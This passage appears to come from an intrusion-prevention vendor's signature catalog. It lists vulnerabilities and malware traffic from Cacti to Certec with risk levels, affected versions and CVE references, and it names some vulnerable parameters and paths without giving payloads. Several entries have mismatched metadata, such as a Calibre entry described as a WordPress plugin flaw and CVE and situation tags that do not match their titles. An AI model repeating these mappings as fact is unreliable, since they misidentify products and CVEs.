Type:

Input Validation

Description:

Improper validation of HTTP request parameters causes a cross-site scripting vulnerability in Cacti. Successful exploitation allows an attacker to run arbitrary scripts in the user's browser.

Situation:

HTTP_CRL-Cacti-Spikekill-Cross-Site-Scripting

References:

CVE-2017-12927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12927

Cain-And-Abel-RDP-Buffer-Overflow

About this vulnerability:

A Cain and Abel RDP Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-801-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Cain and Abel

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Cain and Abel, version 4.9.24, which allows remote attackers to execute arbitrary code via a long string in an RDP file.

Situation:

File-Text_Cain-And-Abel-RDP-Buffer-Overflow

References:

CVE-2008-5405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5405

BID-32543
http://www.securityfocus.com/bid/32543

OSVDB-50342
http://www.osvdb.org/50342

CakePHP-PHP-Injection-Unserialize-Attack

About this vulnerability:

A PHP Injection Unserialize Attack in CakePHP 1.3.x-1.3.5 and 1.28

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1720-5242

Platform:

Any Operating System

Software:

CakePHP

Type:

PHP Injection

Description:

CakePHP versions 1.3.x-1.3.5 and 1.28 allows remote attackers to execute arbitrary code by allowing modification of data values, in the Cake cache, that is processed by the unserialize function.

Situation:

File-Text_CakePHP-PHP-Injection-Unserialize-Attack

References:

CVE-2010-4335
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4335

BID-44852
http://www.securityfocus.com/bid/44852

OSVDB-69352
http://www.osvdb.org/69352

Calendar-Pl-Remote-Command

About this vulnerability:

Calendar.pl remote command execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1761-5242

Platform:

Generic

Software:

Calendar.pl

Type:

Code Injection

Description:

The calendar.pl script has a vulnerability that could allow an attacker to run arbitrary commands. This is because calendar.pl is not protected against executing programs by passing '|' to the open() call.

References:

CVE-2000-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0432

BID-1215
http://www.securityfocus.com/bid/1215

Calibre-Python-Code-Injection-CVE-2024-6782

About this vulnerability:

A vulnerability in WordPress Project Husky Products Filter Plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1769-5242

Last changed:

sgpkg-ips-1769-5242

Platform:

Generic

Software:

Calibre

Type:

Input Validation

Description:

Improper validation of request contents causes a code injection vulnerability in Calibre. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Calibre-Python-Code-Injection-CVE-2024-6782

References:

CVE-2024-6782
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6782

Cambium-ePMP-1000-Ping-Command-Injection

About this vulnerability:	A Cambium ePMP 1000 Ping Command Injection Vulnerability
Risk:	High
First detected in:	sgpkg-ips-1075-5242
Last changed:	sgpkg-ips-1383-5242
Platform:	Generic
Software:	Cambium ePMP
Type:	Input Validation
Description:	A vulnerability in Cambium ePMP 1000 devices, versions 2.5 and before, which allows remote attackers to run arbitrary OS commands via the ping_ip and traceroute_ip functions, due to insufficient input validation.
Situation:	HTTP_CRL-Cambium-ePMP-1000-Ping-Command-Injection

Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149

About this vulnerability:

An attempt to exploit a vulnerability in Campcodes Online Thesis Archiving System detected

Risk:

High

First detected in:

sgpkg-ips-1592-5242

Last changed:

sgpkg-ips-1592-5242

Platform:

Generic

Software:

Campcodes Online Thesis Archiving System

Type:

Input Validation

Description:

This vulnerability was found in Campcodes Online Thesis Archiving System 1.0. It affects the file "/admin/user/manage_user.php", in which the manipulation of the argument "id" leads to SQL injection.

Situation:

HTTP_CRL-Campcodes-Thesis-Archiving-System-SQL-Injection-CVE-2023-2149

References:

CVE-2023-2149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2149

Campo-Downloader-Malware-Infection-Traffic

About this vulnerability:	Campo Downloader malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1310-5242
Last changed:	sgpkg-ips-1329-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Campo Downloader malware infection traffic was detected.
Situation:	HTTP_CSU-Campo-Downloader-Malware-Infection-Traffic HTTP_SHS-Campo-Downloader-Malware-Infection-Traffic

Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230

About this vulnerability:

A vulnerability in Camtron CMNC-200

Risk:

High

First detected in:

sgpkg-ips-1788-5242

Last changed:

sgpkg-ips-1788-5242

Platform:

Generic

Software:

Camtron CMNC-200

Type:

Buffer Overflow

Description:

A stack buffer overflow in the Camtron CMNC-200 and TecVoz CMNC-200 IP camera firmware version 1.102A-008 allows unauthenticated remote code execution via a crafted HTML document.

Situation:

File-Text_Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230

References:

CVE-2010-4230
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4230

Canon-Printer-Denial-Of-Service

About this vulnerability:

A Canon Printer Denial Of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-700-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Canon

Type:

Input Validation

Description:

A vulnerability in the Canon MG3100, MG5300, MG6100, MP495, MX340, MX870, MX890, MX920, and MX922 printers that allows remote attackers to cause a denial of service condition via a crafted LAN_TXT24 parameter to the English/pages_MacUS/cgi_lan.cgi followed by a direct request to English/pages_MacUS/lan_set_content.html.

Situation:

HTTP_CRL_Canon-Printer-Denial-Of-Service

References:

CVE-2013-4615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4615

BID-60598
http://www.securityfocus.com/bid/60598

Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Canonical ksmdb-tools
Risk:	Moderate
First detected in:	sgpkg-ips-1650-5242
Last changed:	sgpkg-ips-1651-5242
Platform:	Generic
Software:	Canonical ksmdb-tools
Type:	Buffer Overflow
Description:	Insufficient validation of LSARPC requests submitted to ksmbd.mountd daemon causes a heap buffer overflow vulnerability in Canonical ksmbd-tools. A successful exploit allows an attacker to cause a denial of service condition or execute code on the target system.
Situation:	MSRPC-TCP_CPS-Canonical-Ksmbd-Tools-Ksmbd.Mountd-SMB_Read_Sid-Heap-Buffer-Overflow

Carberp-Botnet

About this vulnerability:	Carberp Botnet
Risk:	High
First detected in:	sgpkg-ips-373-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Carberp
Type:	Backdoor
Description:	Carberp is a trojan horse program. Hosts compromised by this trojan form a remote controllable botnet. The controller of the botnet can run arbitrary code on the compromised hosts as well as spy everything the users of the compromised hosts do.
Situation:	HTTP_CS-Carberp-Botnet-Traffic-Detected HTTP_CSU-Carberp-Botnet-Traffic-Detected HTTP_CSH-Carberp-Botnet-Traffic-Detected HTTP_CRL-Carberp-Botnet HTTP_CRL-Carberp-Botnet-Traffic-Detected

Carberp-Web-Panel-Remote-Code-Execution

About this vulnerability:	Carberp Web Panel Remote Code Execution
Risk:	High
First detected in:	sgpkg-ips-800-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Carberp
Type:	Buffer Overflow
Description:	An attempt at remote code execution for the Carberp botnet C2 Web Panel.
Situation:	HTTP_CRL-Carberp-Web-Panel-Remote-Code-Execution

Carel-PlantVisor-Directory-Traversal

About this vulnerability:	A vulnerability in Carel PlantVisor
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Carel PlantVisor
Type:	Malfunction
Description:	There are multiple directory traversal vulnerabilities in Carel PlantVisor which allow an unauthorized remote attacker to write or delete arbitrary files and to execute arbitrary commands.
Situation:	HTTP_CRL-Carel-PlantVisor-Directory-Traversal

Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability

About this vulnerability:	A vulnerability in Carel PlanVisor Pro
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Carel PlantVisor Pro
Type:	Malfunction
Description:	Carel PlantVisor Pro uses hardcoded credentials.
Situation:	HTTP_CSU-Carel-PlantVisor-Pro-Hardcoded-Credentials-Vulnerability

Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability

About this vulnerability:	A vulnerability in Carel PlanVisor Pro
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Carel PlantVisor Pro
Type:	Malfunction
Description:	There is a local file inclusion vulnerability in Carel PlantVisor Pro which allows an attacker to download arbitrary files.
Situation:	HTTP_CSU-Carel-PlantVisor-Pro-Local-File-Inclusion-Vulnerability

Carlo-Gavazzi-PowerSoft-Directory-Traversal

About this vulnerability:	A vulnerability in Carlo Gavazzi PowerSoft
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Carlo Gavazzi PowerSoft
Type:	Malfunction
Description:	There is a directory traversal vulnerability in Carlo Gavazzi PowerSoft. Successful exploitation by a remote attacker could result in the disclosure of sensitive information.
Situation:	HTTP_CSU-Carlo-Gavazzi-PowerSoft-Directory-Traversal

Castle-Rock-Computing-SNMPc-Cross-Site-Scripting-CVE-2016-5642

About this vulnerability:

An attempt to exploit a vulnerability in Castle Rock Computing SNMPc detected

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Castle Rock Computing SNMPc Network Manager

Type:

Input Validation

Description:

Castle Rock Computing SNMPc before 2015-12-17 has a cross-site scripting (XSS) vulnerability via SNMP Trap messages.

Situation:

HTTP_CRL-Cayin-CMS-NTP-Server-RCE

References:

CVE-2015-6027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6027

Cayin-CMS-NTP-Server-RCE

About this vulnerability:

A vulnerability in Cayin CMS.

Risk:

High

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Linux

Software:

Cayin CMS

Type:

Input Validation

Description:

A vulnerability in Cayin CMS, versions 11.0 and before, which allows remote attackers to execute arbitrary shell commands via the ntpIp parameter to system_service.cgi, due to insufficient input validation.

Situation:

References:

CVE-2020-7357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7357

Cayin-xPost-wayfinder_seqid-SQLi

About this vulnerability:

A vulnerability in Cayin xPost

Risk:

High

First detected in:

sgpkg-ips-1289-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cayin xPost

Type:

Input Validation

Description:

There exists a vulnerability in Cayin xPost, versions 2.5 and before, which allows remote attackers to peform an SQL injection in the wayfinder_seqid parameter, due to the lack of user input validation.

Situation:

HTTP_CRL-Cayin-xPost-wayfinder_seqid-SQLi

References:

CVE-2020-7356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7356

CCSO-Mercury-Mail-Transport-System-Long-Command-BOF

About this vulnerability:

Mercury Mail Transport System buffer overflow via long command lines

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mercury Mail Transport System

Type:

Buffer Overflow

Description:

Certain versions of Mercury Mail Transport System suffer from a buffer overflow vulnerability. Commands are delimited by linefeeds, and each command is copied into a buffer of 528 bytes without any length checks. A long command line will overflow the buffer, allowing remote attackers to execute arbitrary code with the privileges of the service process. The vulnerable service is started with Administrator privileges by default.

Situation:

CCSO_Mercury-Mail-Transport-System-Long-Command-BOF

References:

CVE-2005-4411
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4411

BID-16396
http://www.securityfocus.com/bid/16396

OSVDB-22103
http://www.osvdb.org/22103

CCTV-DVR-Remote-Code-Execution

About this vulnerability:	An attempt to exploit a vulnerability in CCTV/DVR devices detected
Risk:	High
First detected in:	sgpkg-ips-1606-5242
Last changed:	sgpkg-ips-1606-5242
Platform:	Generic
Software:	Any Software
Type:	Input Validation
Description:	It is possible to exploit a remote code execution vulnerability in the /language component of multiple CCTV/DVR devices as it does not correctly sanitize the value of the given parameter.
Situation:	HTTP_CRL-Unix-IFS-Code-Execution

CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877

About this vulnerability:

A vulnerability in CentOS Web Panel

Risk:

High

First detected in:

sgpkg-ips-1544-5242

Last changed:

sgpkg-ips-1544-5242

Platform:

Generic

Software:

CentOS Web Panel

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in the CentOS Web Panel 7 versions before v0.9.8.1147.

Situation:

HTTP_CRL-CentOS-Web-Panel-7-Remote-Code-Execution-CVE-2022-44877

References:

CVE-2022-44877
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44877

CentOS-Web-Panel-Command-Injection-CVE-2018-18322

About this vulnerability:

A vulnerability in CentOS Web Panel

Risk:

High

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

CentOS Web Panel

Type:

Input Validation

Description:

There exists a command injection vulnerability in CentOS Web Panel 0.9.8.480. A successful exploitation could allow remote attackers to execute arbitrary commands with shell metacharacters.

Situation:

HTTP_CRL-CentOS-Web-Panel-Command-Injection-CVE-2018-18322

References:

CVE-2018-18322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18322

Centreon-centreonAuth-Command-Injection

About this vulnerability:	A vulnerability in Centreon
Risk:	High
First detected in:	sgpkg-ips-789-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Centreon
Type:	Input Validation
Description:	There exists a command injection vulnerability in the centreonAuth.class.php authentication component of Centreon. This can allow a remote, unauthenticated attacker to execute arbitrary system commands on the affected system.
Situation:	HTTP_CRL-Centreon-centreonAuth-Command-Injection

Centreon-CSV_hostgrouplogs-SQL-Injection

About this vulnerability:

A vulnerability in Centreon

Risk:

Moderate

First detected in:

sgpkg-ips-1380-5242

Last changed:

sgpkg-ips-1380-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Improper input validation in csv_HostGroupLogs.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-CSV_hostgrouplogs-SQL-Injection

References:

CVE-2021-37556
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37556

Centreon-formMibs-Command-Injection

About this vulnerability:

A vulnerability in Centreon

Risk:

High

First detected in:

sgpkg-ips-1226-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

There exists a vulnerability in Centreon, versions 19.04.3 and before, which allows remote attackers to execute limited arbitrary code due to the lack of input validation of the formMibs.php form.

Situation:

HTTP_CS-Centreon-formMibs-Command-Injection

References:

CVE-2019-15298
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15298

Centreon-Generateimage-Index-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon

Risk:

Moderate

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation in the generateImage.php component of Centreon causes an SQL injection vulnerability which can be exploited to gain the ability to execute arbitrarty SQL on the target system.

Situation:

HTTP_CRL-Centreon-Generateimage-Index-SQL-Injection

References:

CVE-2021-37557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37557

Centreon-Graph-Split-Chartid-SQL-Injection

About this vulnerability:	A vulnerability in Centreon
Risk:	Moderate
First detected in:	sgpkg-ips-1391-5242
Last changed:	sgpkg-ips-1391-5242
Platform:	Generic
Software:	Centreon
Type:	Input Validation
Description:	Insufficient input validation in graph-split.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target database.
Situation:	HTTP_CRL-Centreon-Graph-Split-Chartid-SQL-Injection

Centreon-Hostgroupdependency-dep_Id-SQL-Injection

About this vulnerability:	A vulnerability in Centreon Project Centreon
Risk:	Moderate
First detected in:	sgpkg-ips-1380-5242
Last changed:	sgpkg-ips-1380-5242
Platform:	Generic
Software:	Centreon
Type:	Input Validation
Description:	Improper input validation in hostGroupDependency.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to exeucte arbitrary SQL on the target system.
Situation:	HTTP_CRL-Centreon-Hostgroupdependency-dep_Id-SQL-Injection

Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon

Risk:

Moderate

First detected in:

sgpkg-ips-1396-5242

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation in the ProceduresProxy.class.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to run arbitrary SQL on the target database.

Situation:

HTTP_CRL-Centreon-Knowledgebase-Proxy-Proceduresproxy-SQL-Injection

References:

CVE-2021-37558
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37558

Centreon-Metaservice-Meta_Id-SQL-Injection

About this vulnerability:	A vulnerability in Centreon Project Centreon
Risk:	Moderate
First detected in:	sgpkg-ips-1384-5242
Last changed:	sgpkg-ips-1384-5242
Platform:	Generic
Software:	Centreon
Type:	Input Validation
Description:	An SQL Injection vulnerability has been reported in the Centreon Web Application. The vulnerability is due to incorrect input validation in metaService.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.
Situation:	HTTP_CRL-Centreon-Metaservice-Meta_Id-SQL-Injection

Centreon-Nagios-Path-Command-Injection

About this vulnerability:

A vulnerability in Centreon

Risk:

High

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Windows; Linux; Unix

Software:

Centreon

Type:

Input Validation

Description:

There exists a vulnerability in Centreon, versions 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29, which allows remote attackers to execute arbitrary code via the nagios_bin parameter to main.get.php, due to insufficient user input validation.

Situation:

HTTP_CRL-Centreon-Nagios-Path-Command-Injection

References:

CVE-2019-13024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13024

Centreon-poller-Remote-Command-Execution

About this vulnerability:

A vulnerability in Centreon

Risk:

High

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1383-5242

Platform:

Linux

Software:

Centreon

Type:

Input Validation

Description:

There exists a vulnerability in Centreon, version 19.10.5, which allows remote attackers to execute arbitrary code through poller management.

Situation:

HTTP_CRL-Centreon-poller-Remote-Command-Execution

References:

CVE-2019-19699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19699

Centreon-RRDdatabase_Status_Path-Command-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon

Risk:

Moderate

First detected in:

sgpkg-ips-1259-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the Centreon Web Application. The vulnerability is due to improper validation of the RRDdatabase_status_path parameter in an HTTP request. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary command execution in the context of the server process.

Situation:

HTTP_CRL-Centreon-RRDdatabase_Status_Path-Command-Injection

References:

CVE-2020-13252
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13252

Centreon-Serverconnectionconfigurationservice.php-Command-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon

Risk:

Moderate

First detected in:

sgpkg-ips-1237-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Improper handling of the server_ip parameter in a HTTP request causes a command injection vulnerability in the Centreon Web Application. A successful exploit allows an attacker to execute arbitrary commands on the target with the privileges of the vulnerable service.

Situation:

File-Text_Centreon-Serverconnectionconfigurationservice.php-Command-Injection

References:

CVE-2020-9463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9463

Centreon-SQL-And-Command-Injection

About this vulnerability:

A Centreon SQL And Command Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

A vulnerability in Centron 2.5.1 and before, and Centron Enterprise Server 2.2, which allows remote attackers to execute SQL injections, or arbitrary commands, via the index_id parameter to views/graphs/common/makeXML_ListMetrics.php, the sid parameter to views/graphs/GetXmlTree.php, the session_id parameter to views/graphs/graphStatus/displayServiceStatus.php, the mdftr_id parameter to configuration/configObject/traps/GetXMLTrapsForVendor.php, and the index parameter to common/javascript/commandGetArgs/cmdGetExample.php. The older versions use a URL of views/graphs/statusGraphs/ instead of views/graphs/graphStatus/. This covers CVE-2014-3828 and CVE-2014-3829.

Situation:

HTTP_CRL_Centreon-SQL-And-Command-Injection

References:

CVE-2014-3828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3828

BID-70648
http://www.securityfocus.com/bid/70648

Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1780-5242

Last changed:

sgpkg-ips-1780-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Improper validation of user input used in the initCurveList function causes an SQL injection vulnerability in Centreon Web. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Centreongraph-Initcurvelist-SQL-Injection

References:

CVE-2024-5725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5725

Centreon-Web-Formcontactgroup-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1542-5242

Last changed:

sgpkg-ips-1542-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation in formContactGroup.php causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Formcontactgroup-SQL-Injection

References:

CVE-2022-42427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42427

Centreon-Web-Insertgraphtemplate-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation when creating graph templates causes an SQL injection vulnerability in Centreon Web. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Insertgraphtemplate-SQL-Injection

References:

CVE-2024-23119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23119

Centreon-Web-Managevmetric-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1844-5242

Last changed:

sgpkg-ips-1844-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Improper validation of user input when creating or modifying virtual metrics causes an SQL injection vulnerability in Centreon. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Managevmetric-SQL-Injection

References:

CVE-2024-55573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55573

Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1557-5242

Last changed:

sgpkg-ips-1557-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

A SQL Injection vulnerability has been reported in the Centreon Web Poller Broker module. The vulnerability is due to insufficient input validation when disabling broker configurations. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CRL-Centreon-Web-poller-Broker-Disablcentreonbrokerindb-SQL-Injection

References:

CVE-2022-42424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42424

Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection

About this vulnerability:

A vulnerability in Centreon

Risk:

Moderate

First detected in:

sgpkg-ips-1535-5242

Last changed:

sgpkg-ips-1550-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation when enabling broker configurations causes an SQL injection vulnerability in Centreon Web. A successful exploit allows an attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Centreon-Web-poller-Broker-Enablecentreonbrokerindb-SQL-Injection

References:

CVE-2022-42425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42425

Centreon-Web-poller-Broker-Insertconfig-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1532-5242

Last changed:

sgpkg-ips-1532-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation causes an SQL injection vulnerability in Centreon. A successful exploit allows an attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Centreon-Web-poller-Broker-Insertconfig-SQL-Injection

References:

CVE-2022-42429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42429

Centreon-Web-poller-Resource-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation causes an SQL injection vulnerability in Centreon Web. A successful exploit allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-poller-Resource-SQL-Injection

References:

CVE-2022-41142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41142

Centreon-Web-Updatecontactservicecommands-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1734-5242

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation when updating service notification commands on a user causes an SQL injection in Centreon Web. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Updatecontactservicecommands-SQL-Injection

References:

CVE-2024-23117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23117

Centreon-Web-Updatedirectory-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

An SQL Injection vulnerability has been reported in the Centreon Web module. The vulnerability is due to insufficient input validation when updating media upload directories. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the server. A successful attack may result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CRL-Centreon-Web-Updatedirectory-SQL-Injection

References:

CVE-2024-0637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0637

Centreon-Web-Updatelcarelation-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1728-5242

Last changed:

sgpkg-ips-1728-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Insufficient input validation when updating menu ACL relations causes an SQL injection vulnerability in Centreon. A successful exploit allows an attakcer to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Centreon-Web-Updatelcarelation-SQL-Injection

References:

CVE-2024-23116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23116

Centreon-Web-Updateservicehost-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1776-5242

Last changed:

sgpkg-ips-1776-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Improper validation of user input used in the updateServiceHost function causes an SQL injection vulnerability in Centreon. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Updateservicehost-SQL-Injection

References:

CVE-2024-5723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5723

Centreon-Web-Updateservicehost_MC-SQL-Injection

About this vulnerability:

A vulnerability in Centreon Project Centreon Web

Risk:

Moderate

First detected in:

sgpkg-ips-1812-5242

Last changed:

sgpkg-ips-1812-5242

Platform:

Generic

Software:

Centreon

Type:

Input Validation

Description:

Improper validation of user input used in the updateServiceHost_MC function causes an SQL injection vulnerability in Centreon. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-Centreon-Web-Updateservicehost_MC-SQL-Injection

References:

CVE-2024-32501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32501

Certec-atvise-atserver-Denial-of-Service

About this vulnerability:	Certec atvise atserver.exe denial of service.
Risk:	High
First detected in:	sgpkg-ips-628-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Certec Atvise
Type:	Malfunction
Description:	A vulnerability in atserver.exe that allows a remote attacker to crash the service by sending the specially crafted tcp packet.
Situation:	Generic_CS-Certec-atvise-atserver-Denial-of-Service

Certec-atvise-webMI2ADS-Denial-Of-Service

About this vulnerability:

A vulnerability in Certec atvise webMI2ADS

Risk:

Moderate

First detected in:
